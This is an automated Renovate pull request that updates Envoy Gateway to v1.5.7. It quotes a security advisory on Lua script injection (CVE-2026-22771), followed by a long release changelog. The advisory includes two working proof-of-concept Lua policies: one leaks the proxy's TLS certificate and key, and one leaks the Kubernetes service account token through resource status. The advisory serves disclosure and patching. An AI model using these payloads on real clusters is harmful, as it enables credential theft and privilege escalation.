fix(deps): update module github.com/envoyproxy/gateway to v1.5.7 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/envoyproxy/gateway	v1.4.2 → v1.5.7

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

Envoy Extension Policy lua scripts injection causes arbitrary command execution

CVE-2026-22771 / GHSA-xrwg-mqj6-6m22

More information

Details

Impact

Envoy Gateway allows users to create Lua scripts that are executed by Envoy proxy using the EnvoyExtensionPolicy resource. Administrators can use Kubernetes RBAC to grant users the ability to create EnvoyExtensionPolicy resources. Lua scripts in policies are executed in two contexts:

• An EnvoyExtensionPolicy can be attached to Gateway and xRoute resources. Lua scripts in the policy will process traffic in that scope.
• Lua scripts are interpreted and run by the Envoy Gateway controller pod for validation purposes.

Lua scripts executed by Envoy proxy can be used to leak the proxy's credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication.

For example, the following EnvoyExtensionPolicy, when executed by Envoy proxy, will leak the proxy's XDS client certificates.

apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyExtensionPolicy
metadata:
  name: lua-leak
spec:
  targetRefs:
    - group: gateway.networking.k8s.io
      kind: HTTPRoute
      name: leak
  lua:
    - type: Inline
      inline: |
           function envoy_on_response(response_handle)
             local cert = io.open("/certs/tls.crt", "r")
             local content
             if cert then
                content = cert:read("*all")
                cert:close()
             else
                content = "file-not-found"
             end
             local keyfile = io.open("/certs/tls.key", "r")
             local contentkey
             if keyfile then
                contentkey = keyfile:read("*all")
                keyfile:close()
             else
                contentkey = "file-not-found"
             end
             local keypair = contentkey .. "\n" .. content
             response_handle:body():setBytes(keypair)
             response_handle:headers():replace("content-length", tostring(#keypair))
             response_handle:headers():replace("content-type", "text/plain")
           end

This execution can lead to arbitrary code execution in the Envoy Gateway controller pod. Attackers can leverage this to achieve privilege escalation. For example, the following EnvoyExtensionPolicy will read the Envoy Gateway K8s service account token and return it in an error which will be displayed in the resource status.

apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyExtensionPolicy
metadata:
  name: lua-leak
spec:
  targetRefs:
    - group: gateway.networking.k8s.io
      kind: HTTPRoute
      name: backend
  lua:
    - type: Inline
      inline: |
        function envoy_on_response(response_handle)
          local token = io.open("/var/run/secrets/kubernetes.io/serviceaccount/token", "r")
          local content
          if token then
             content = token:read("*all")
             token:close()
          else
             content = "file-not-found"
          end
          io.write(content)
          error(content)
        end

Results in:

apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyExtensionPolicy
metadata:
  name: lua-leak
[...]
status:
  ancestors:
    - ancestorRef:
        group: gateway.networking.k8s.io
        kind: Gateway
        name: eg
        namespace: default
      conditions:
        - lastTransitionTime: "..."
          message: "Lua: validation failed for lua body in policy with name envoyextensionpolicy/default/lua-leak/lua/0:
        failed to validate with envoy_on_response: <string>:622: [REDACTED TOKEN]\nstack
        traceback:\n\t[G]: in function 'error'\n\t<string>:622: in function 'envoy_on_response'\n\t<string>:625:
        in main chunk\n\t[G]: ?."

Attackers can then use this token to steal other secrets, run arbitrary pods in the envoy-gateway-system namespace and delete Envoy Gateway itself.

Patches

The patch sets secure defaults and addresses lack of guardrails allowing arbitrary Lua execution:

• Runs Lua Strict validation by default in Envoy Gateway along with a security hardening module. This module blocks dangerous Lua code that may be executed in proxy and controller pods.
• Renamed Syntax to InsecureSyntax validation mode to signify that in this validation mode Lua won't be validated for possible security gaps.
• Supports a new disableLua option in EnvoyProxy that rejects EnvoyExtenstionPolicies with Lua scripts entirely, blocking the option to execute arbitrary Lua code.

Workarounds

Envoy Gateway users can create Kubernetes RBAC rules (see docs) that apply on EnvoyExtensionPolicy resources to restrict creation of these Lua policies to trusted namespaces. Note that this restriction will apply to all EnvoyExtensionPolicies, regardless of the extensibility option that is used (Lua, Wasm or Ext-Proc).

Severity

• CVSS Score: 8.8 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/envoyproxy/gateway/security/advisories/GHSA-xrwg-mqj6-6m22
• https://nvd.nist.gov/vuln/detail/CVE-2026-22771
• https://github.com/advisories/GHSA-xrwg-mqj6-6m22

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

envoyproxy/gateway (github.com/envoyproxy/gateway)

v1.5.7

Compare Source

Release Announcement

Check out the v1.5.7 release notes to learn more about the release.

v1.5.6

Compare Source

Release Announcement

Check out the v1.5.6 release notes to learn more about the release.

v1.5.5

Compare Source

Release Announcement

Check out the v1.5.5 release notes to learn more about the release.

v1.5.4

Compare Source

Release Announcement

Check out the v1.5.4 release notes to learn more about the release.

v1.5.3

Compare Source

Release Announcement

Check out the v1.5.3 release notes to learn more about the release.

v1.5.2

Compare Source

Release Announcement

Check out the v1.5.2 release notes to learn more about the release.

v1.5.1

Compare Source

Release Announcement

Check out the v1.5.1 release notes to learn more about the release.

v1.5.0

Release Announcement

Check out the v1.5 release announcement to learn more about the release.

What's Changed

• skip building egctl for windows_arm64 by @​arkodg in #​5878
• docs(grpc): add note on using BackendTrafficPolicy for GPRC timeouts by @​Antvirf in #​5822
• ci: remove windows_arm64 uploads by @​arkodg in #​5884
• increase liveness probe failureThreshold for shutdown manager by @​arkodg in #​5877
• fix: remove sanposhiho from reviewers by @​sanposhiho in #​5870
• fix: make topology injector best effort by @​arkodg in #​5891
• docs: Change Subtitle of Concept Template by @​melsal13 in #​5893
• Revert "increase liveness probe failureThreshold for shutdown manager… by @​arkodg in #​5889
• release notes for v1.4.0-rc.2 by @​arkodg in #​5899
• chore: ignore api types in codecov by @​shawnh2 in #​5886
• chore/ci: add go.lint.fmt target by @​cnvergence in #​5846
• fix: staticcheck issues by @​mmorel-35 in #​5779
• docs: local jwks by @​zhaohuabing in #​5806
• disable settings by default in gateway-crds-helm by @​arkodg in #​5894
• Add seed corpus to guide the fuzzer to generate combinations of gatew… by @​sudiptob2 in #​5904
• fix(chart): passing root context to template by @​hansselvig in #​5902
• chore: improve merge test by @​zirain in #​5861
• fix: httproute precedence by considering header/query match type by @​kkk777-7 in #​5740
• ci: make helm-generate should failed as expected by @​zirain in #​5908
• docs(rate-limit): minor fix in 'Distinct Users Except Admin' section by @​tomas-rojo in #​5912
• adpot internals/utils/merge.Merge by @​zirain in #​5917
• Add Bitnami as an Envoy Gateway adopter by @​carrodher in #​5926
• build(deps): bump google/osv-scanner-action from 2.0.1 to 2.0.2 by @​dependabot[bot] in #​5920
• build(deps): bump github/codeql-action from 3.28.16 to 3.28.17 by @​dependabot[bot] in #​5919
• build(deps): bump github.com/valyala/fasthttp from 1.60.0 to 1.61.0 in /examples/preserve-case-backend in the github-com group across 1 directory by @​dependabot[bot] in #​5921
• docs: fix example for http redirects page by @​mczaplinski in #​5830
• docs: Add docs for request buffering by @​markwinter in #​5910
• feat: support configuring tls for dynamic resolver backend by @​zhaohuabing in #​5867
• fix: fix topology injector bug by @​jukie in #​5911
• feat: allow merge rate limit rule in BTP by @​zirain in #​5915
• docs: install EG via Argo CD by @​zhaohuabing in #​5824
• chore: clean up BTP status by @​zhaohuabing in #​5934
• e2e: test for dynamic resolver backend using system ca for TLS by @​zhaohuabing in #​5932
• feat: implement offline kubernetes controller by @​shawnh2 in #​5767
• fix: SecurityPolicy reference grant by @​kkk777-7 in #​5792
• fix: add validation for header values by @​gavinkflam in #​5933
• fix: Fixed typo in error message. by @​mathias-ws in #​5945
• e2e: disable DynamicResolverBackendTest on IPv6 by @​zhaohuabing in #​5964
• fix: proxy creation/deletion error handling in GatewayNamespace mode by @​zirain in #​5954
• ci: kube-deploy support KUBE_DEPLOY_PROFILE by @​zirain in #​5957
• fix: process remaining gatewayClasses after encountering an err by @​arkodg in #​5953
• fix: do not add tls inspector filter to quic listener by @​Xunzhuo in #​5671
• Add seed corpus related to traffic task. by @​sudiptob2 in #​5947
• [release/v1.3] release v1.3.3 notes by @​guydc in #​5969
• e2e: fix PreserveCase flaky by @​zirain in #​5966
• feat: validate JWT token and use projected token by @​cnvergence in #​5871
• feat: add controller namespace field to infrastructure render by @​cnvergence in #​5937
• e2e: GatewayNamespace mode by @​zirain in #​5961
• helm: support standard channel by @​zhaohuabing in #​5958
• e2e: bump upgrade test version to v1.3.2 by @​zirain in #​5976
• fix: add validation for duplicated API keys by @​gavinkflam in #​5955
• [release/v1.3] update site to use v1.3.3 by @​guydc in #​5980
• docs: dynamic resolver backend by @​zhaohuabing in #​5935
• Fuzzing: Fail on xds translation error by @​sudiptob2 in #​5986
• fix btp merge not working when there's multi parent refs on router by @​zirain in #​5967
• e2e: fix GRPCExtAuth flaky by @​zirain in #​5987
• chore: add coverpkg for coverage test by @​shawnh2 in #​5991
• ci: enable conformance test for GatewayNamespaceMode by @​zirain in #​5992
• e2e: add CollectAndDump for EGUpgrade test by @​zirain in #​5998
• e2e: add test for BTP timeout by @​zirain in #​5994
• Remoe check for accesslog formatter by @​zirain in #​5985
• e2e: fix GRPCExtAuth/http_route_with_ext_auth_authentication by @​zirain in #​6001
• chore: update dependabot by @​zirain in #​6007
• e2e: update CORS test by @​zirain in #​6011
• chore: add multiple gateways testdata for GatewayNamespace mode by @​cnvergence in #​5972
• feat: adds support for extension server in standalone mode by @​mathetake in #​5984
• docs: Add new conceptual pages for intro concepts by @​melsal13 in #​5981
• docs: update open graph image by @​missBerg in #​6022
• temporarily disable the backend tls test by @​zhaohuabing in #​6030
• Fix lint by @​zhaohuabing in #​6031
• fix: allows offline k8s controller to use non default CRDs by @​mathetake in #​6020
• e2e: refactor ratelmit test by @​zirain in #​5997
• moved shared under rules by @​ryanhristovski in #​5944
• docs: fix path to og:image by @​missBerg in #​6046
• version and release notes for v1.4.0 by @​arkodg in #​6048
• docs: add cherry-pick range example in release steps by @​arkodg in #​6045
• docs: clean up quickstart by @​arkodg in #​6051
• Release news for v1.4.0 by @​arkodg in #​6050
• chore: publish shouldnt wait for resilience-test by @​arkodg in #​6053
• docs: fix v1.4 release news by @​arkodg in #​6058
• build(deps): bump the gomod group across 6 directories with 8 updates by @​dependabot[bot] in #​6016
• build(deps): bump the gomod group across 2 directories with 3 updates by @​dependabot[bot] in #​6060
• v1.4 docs by @​zhaohuabing in #​6052
• update release process by @​zhaohuabing in #​6063
• e2e: fix EnvoyProxyCustomName by @​zirain in #​6014
• fix: custom controller namespace refs in gateway namespace mode by @​cnvergence in #​6065
• e2e: fix BackendUpgrade flaky by @​zirain in #​6038
• build(deps): bump actions/setup-go from 5.4.0 to 5.5.0 in /tools/github-actions/setup-deps in the github-actions group across 1 directory by @​dependabot[bot] in #​6004
• e2e: fix backend tls test by @​zhaohuabing in #​6029
• pin envoy image in e2e tests to avoid ext proc test failure by @​zhaohuabing in #​6078
• chore: utils.Merge by @​zirain in #​6074
• Fix flaky wasm permission cache tests by @​zhaohuabing in #​6085
• docs: add gateway namespace mode documentation by @​cnvergence in #​6040
• add @​cnvergence and @​rudrakhp as maintainers by @​arkodg in #​6089
• e2e: enable EGUpgrade test by @​zirain in #​6079
• e2e: fix BackendTLSSettings by @​zirain in #​6090
• chore: use the latest envoy image for e2e by @​zhaohuabing in #​6093
• Fuzzing: hardcode minor parameters to let the fuzzer only generate re… by @​sudiptob2 in #​6101
• fix(translator): make OIDC and JWT authentication work together by @​StephenRobin in #​5142
• fix(site): fix archetypes with Hugo 0.147.3+ by updating Docsy and render-heading template by @​melsal13 in #​6099
• fix: add FullDuplexStreamed to enum by @​guydc in #​6103
• Docs: fix client ip detection docs by @​rudrakhp in #​6104
• e2e: fix SessionPersistence flaky by @​zirain in #​6082
• e2e: fix flaky and refactor WeightedRoute test by @​zirain in #​6106
• build(deps): bump codecov/codecov-action from 5.4.2 to 5.4.3 by @​dependabot[bot] in #​6112
• build(deps): bump github/codeql-action from 3.28.17 to 3.28.18 by @​dependabot[bot] in #​6111
• fix: ZoneAwareRouting not working GNM(gateway namespace mode) by @​zirain in #​6107
• build(deps): bump the gomod group across 5 directories with 2 updates by @​dependabot[bot] in #​6113
• build(deps): bump distroless/base-nossl from d1fc914 to ecbab76 in /tools/docker/envoy-gateway by @​dependabot[bot] in #​6115
• doc: update release page by @​shawnh2 in #​6109
• build(deps): bump the k8s-io group across 2 directories with 6 updates by @​dependabot[bot] in #​6114
• e2e: fix EnvoyProxyCustomName flaky by @​zirain in #​6122
• e2e: update ZoneAwareRouting by @​zirain in #​6121
• fix(tranlator): SubjectAltNames were being dropped from BackendTLSPolicy.validation by @​ankushagarwal in #​6092
• api(oidc): adds support in OIDC api to optionally deny redirects by @​sam-burrell in #​5455
• use sds to fetch the client certificate for envoy-ratelimit TLS connections by @​zhaohuabing in #​5988
• e2e: fix TCPRouteBackend flaky by @​zirain in #​6120
• feat: local ratelimit support XRateLimitHeaders by @​zirain in #​6059
• feature(translator): cluster and endpoint xds metadata by @​guydc in #​5875
• feat(api): add zone field to BackendEndpoint by @​AlexKrudu in #​6137
• chore: fix CI by @​zirain in #​6148
• change default component log level to misc:error by @​zirain in #​6149
• fix: v1.4 gateway namespace mode deployment link by @​cnvergence in #​6158
• fix: zone-aware-routing e2e falkiness by @​jukie in #​6152
• fix: return early from buildwasms by @​guydc in #​6169
• docs: Added prereq boilerplate to Response Compression doc in latest and v1.4 by @​melsal13 in #​6170
• feat: add ownerreference to infra resources when gateway namespace mode by @​kkk777-7 in #​6100
• use SDS for the client cert for connections with Wasm HTTP server by @​zhaohuabing in #​6139
• chore: bump go and purego by @​zirain in #​6174
• validate gateway namespace mode and merged gateways by @​cnvergence in #​6041
• feat: support app protocol for dynamic resolver backend by @​zhaohuabing in #​5936
• feat: set OverlappingTLSConfig condition for merged Gateways by @​zhaohuabing in #​5862
• add unix domain socket path length validation by @​mukeshmahato17 in #​6160
• ci: fix go.test.cel by @​zirain in #​6185
• docs(fault-injection): fix incorrect policy name by @​pratikgitss in #​6178
• chore: add make help prompt to run golint by @​rudrakhp in #​6177
• Use gateway name as Proxy fleet name for Gateway Namespace mode by @​zirain in #​6135
• feat(translator): support active http healthcheck host by @​guydc in #​6118
• chore: use GetEnvoyProxyComponentLevel by @​zirain in #​6171
• fix: Use quoted values zone annotation in topology injector by @​jukie in #​6133
• local_ratelimit: make sure x-ratelimit-reset exists by @​zirain in #​6157
• docs: update egctl docs by @​arkodg in #​6166
• fix: translate xds udp listener by @​kkk777-7 in #​6183
• Fix shared=true when no clientSelector, by @​ryanhristovski in #​6072
• feat: implementing the ability to optionally deny redirects in security policies by @​sam-burrell in #​6136
• e2e: fix EnvoyProxyDaemonSet test by @​zirain in #​6195
• feat: improve egctl collect by @​zirain in #​6197
• test: make conformance test support RunTest by @​zirain in #​6132
• build(deps): bump the k8s-io group across 2 directories with 1 update by @​dependabot[bot] in #​6188
• Change static uid to for global ratelimit dashboard by @​eminaktas in #​6193
• dump config for flaky dynamic resover test by @​zhaohuabing in #​6196
• chore: fix flaky by @​zhaohuabing in #​6201
• chore: rename ir serverCertificate yaml key to certificate by @​zhaohuabing in #​6080
• decouple Gateway API version with go mod by @​zirain in #​6210
• docs: fix tls customisation minVersion case by @​Dean-Coakley in #​6212
• docs: gateway-crds-helm by @​arkodg in #​6235
• remove infra ENVOY_GATEWAY_NAMESPACE and introduce ENVOY_POD_NAMESPACE envVar for accesslog by @​cnvergence in #​6221
• feat: enable GatewayInfrastructure in GatewayNamespaceMode by @​zirain in #​5996
• Fix broken btp ratelimit merge by @​ryanhristovski in #​6214
• Keep ALPN configuration for listeners with overlapping certificates when ALPN is explicitly set via ClientTrafficPolicy by @​zhaohuabing in #​6217
• Add zone aware routing docs by @​jukie in #​6095
• Allow for headless envoy services by @​ryanhristovski in #​6250
• e2e: use ConformanceOptions.Hook by @​zirain in #​6215
• feat(api): add insecureSkipVerify flag to Backend TLS settigns by @​AlexKrudu in #​6222
• api: support headers and redirects in custom response by @​rudrakhp in #​5549
• v1.4.1 release notes by @​shawnh2 in #​6254
• docs: Conceptual docs for Load Balancing and Rate Limiting by @​melsal13 in #​6088
• docs: Use v1.4.1 tag by @​arkodg in #​6263
• chore: Set accepted condition as true when failed to resolve backends by @​zhaohuabing in #​6081
• add Alibaba Cloud as an Envoy Gateway adopter by @​MaYuan-02 in #​6264
• feat: add option to disable lua validation by @​rudrakhp in #​6176
• conformance: run experimental conformance test on different mode by @​zirain in #​6259
• chore: fix wasm file cache directory permission by @​zhaohuabing in #​6173
• build(deps): bump busybox from 37f7b37 to f85340b in /tools/docker/envoy-gateway by @​dependabot[bot] in #​6246
• Feat: Extension server policy propagation to PostTranslateModify by @​raviverma-ai in #​5914
• fix: add optional flag for hostname fix #​6278 by @​yyadavalli in #​6279
• Update gateway-api-metrics.md by @​saurabtharu in #​6283
• feat(translator): impl tls insecure-skip-verify by @​AlexKrudu in #​6253
• feat: cluster stat name by @​guydc in #​5898
• feat(translator): support setting previous priorities retry predicate by @​Inode1 in #​6204
• docs: enable kapa.ai for doc and content discovery by @​missBerg in #​6288
• build(deps): bump github/codeql-action from 3.28.18 to 3.28.19 by @​dependabot[bot] in #​6273
• build(deps): bump aquasecurity/trivy-action from 0.30.0 to 0.31.0 by @​dependabot[bot] in #​6274
• build(deps): bump ossf/scorecard-action from 2.4.1 to 2.4.2 by @​dependabot[bot] in #​6248
• build(deps): bump the gomod group across 1 directory with 19 updates by @​dependabot[bot] in #​6275
• feat: add gatewayclass ownerreference to infra resources when all cases except gateway namespace mode by @​kkk777-7 in #​6238
• docs: remove unused import in ext grpc auth example by @​Dean-Coakley in #​6291
• feat: support custom redirects by @​rudrakhp in #​6295
• fix wrong enum on SubjectAltNameType by @​zirain in #​6307
• chore: fix unnecessary type arguments lint by @​cnvergence in #​6306
• chore: bump golang to 1.24.4 by @​zirain in #​6300
• ci: add ci-checks by @​zirain in #​6294
• xds: enable udpa.TypeStruct by @​zirain in #​6311
• build(deps): bump github/codeql-action from 3.28.19 to 3.29.0 by @​dependabot[bot] in #​6318
• build(deps): bump nosborn/github-action-markdown-cli from 3.4.0 to 3.5.0 by @​dependabot[bot] in #​6317
• build(deps): bump the gomod group across 5 directories with 6 updates by @​dependabot[bot] in #​6319
• build(deps): bump distroless/base-nossl from ecbab76 to fa7b50f in /tools/docker/envoy-gateway by @​dependabot[bot] in #​6320
• Dynamic variable rendering for btp responseOverride by @​ryanhristovski in #​6297
• feat: support HTTP CONNECT by @​zirain in #​6256
• bugfix: BackendTlsPolicy should not reference across namespace by @​zirain in #​6309
• chore: make log output consistent by @​zirain in #​6314
• feat: support listener name in SecurityPolicy target by @​kinolaev in #​5916
• feat(provider): cache sync period by @​guydc in #​6326
• chore: disable CollectAndDump by default by @​zirain in #​6328
• feat: support user provided name for generated HPA and PDB by @​shahar-h in #​6337
• deps: upgrades func-e to the latest to use latest Envoy with standalone by @​mathetake in #​6339
• feature(translator): expose OIDC oauth cookie samesite configuration by @​vibe in #​6289
• fix: fix bug in hostname overlap detection by @​rudrakhp in #​6332
• feat(api): allow pinning custom image repository for Envoy Proxy. by @​sudiptob2 in #​6296
• feat: load certs fallback to first key by @​zirain in #​6327
• fix(translator): ext-proc full duplex streamed trailers and validation by @​guydc in #​6323
• e2e: simply the Datadog e2e test by @​zirain in #​6361
• build(deps): bump softprops/action-gh-release from 2.2.2 to 2.3.2 by @​dependabot[bot] in #​6292
• fix: invalid basic auth data caused rds rejection by @​Xunzhuo in #​5683
• bugfix: make EnvoyPatchPolicy able to replace telemetry cluster by @​zirain in #​6367
• feat: Add support for configuring maxConnectionsToAcceptPerSocketEvent in ClientTrafficPolicy by @​jukie in #​6233
• default on SameSite attribute unset for Oauth2 cookies by @​arkodg in #​6347
• chore: fix cve by @​zirain in #​6365
• chore: enable ClusterTrustBundle by @​zirain in #​6352
• chore: add kind in status update log by @​zirain in #​6376
• e2e: fix DynamicResolverBackend test by @​zirain in #​6374
• feat: disable automountServiceAccountToken for proxy and ratelimit by @​JefeDavis in #​6364
• build(deps): bump google/osv-scanner-action from 2.0.2 to 2.0.3 by @​dependabot[bot] in #​6380
• feat: add validation of section name for Gateway listener by @​kkk777-7 in #​6343
• Update Community Meeting doc by @​arkodg in #​6391
• chore: drop redundant irKey validation in jwt interceptor by @​cnvergence in #​6362
• ZoneAwareRouting: Differentiate between TrafficDistribution and TopologyAwareRouting by @​jukie in #​5882
• fix: add configMap indexers for EEP reconciler by @​rudrakhp in #​6369
• api: allow to custom service account name by @​zirain in #​6360
• e2e: use different QPS for BackendUpgrade test by @​zirain in #​6373
• chore(installation): early validate presence of tag in image and imageRepository by @​sudiptob2 in #​6354
• docs: benchmark dashboard exploration tool by @​missBerg in #​6399
• fix: policy satus observedGeneration by @​zhaohuabing in #​6397
• bugfix: fix hpa/pdb deletion issue by @​zirain in #​6395
• fix: use buildEndpointType for access and tracing by @​zirain in #​6370
• docs: add tools page for navigating to tools by @​missBerg in #​6407
• e2e: use appropriate values for upgrade test by @​zirain in #​6409
• enhancement: lazy loading validator and defaulter when load resources by @​shawnh2 in #​6403
• Add The Trade Desk as adopter of envoygateway by @​jukie in #​6418
• docs: update links to meeting notes by @​missBerg in #​6420
• Add Verve to adopters.yaml by @​pgold30 in #​6422
• docs: Update zone aware docs by @​jukie in #​6392
• chore: fix doc link by @​shawnh2 in #​6423
• api: add zoneAware lb config by @​jukie in #​6154
• fix: typo in zoneAware API field by @​jukie in #​6426
• feat: OIDC RP initialized logout by @​zhaohuabing in #​6219
• Support client cert validation (spki, hash, san) by @​kinolaev in #​5868
• docs: show table of content in Gateway API Extensions page by @​zirain in #​6432
• build(deps): bump github/codeql-action from 3.29.0 to 3.29.1 by @​dependabot[bot] in #​6437
• fix: default accesslog not working by @​zirain in #​6441
• chore: bump kind and clustertrustbundles CRD by @​zirain in #​6443
• chore: fix cve by @​zirain in #​6446
• chore: fix flaky test EnvoyGatewayCustomSecurityContextUserid by @​zhaohuabing in #​6434
• fix: Do not set backendRequestTimeout when Retries are set by @​sudiptob2 in #​6421
• gatewayapi: don't append gwcResource if there's invalid GatewayClass by @​zirain in #​6379
• build(deps): bump the gomod group acro

✂ Note

PR body was truncated to here.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 4 additional dependencies were updated

Details:

Package	Change
github.com/pelletier/go-toml/v2	v2.2.3 -> v2.2.4
github.com/stoewer/go-strcase	v1.3.0 -> v1.3.1
github.com/tetratelabs/wazero	v1.8.2 -> v1.9.0
gomodules.xyz/jsonpatch/v2	v2.4.0 -> v2.5.0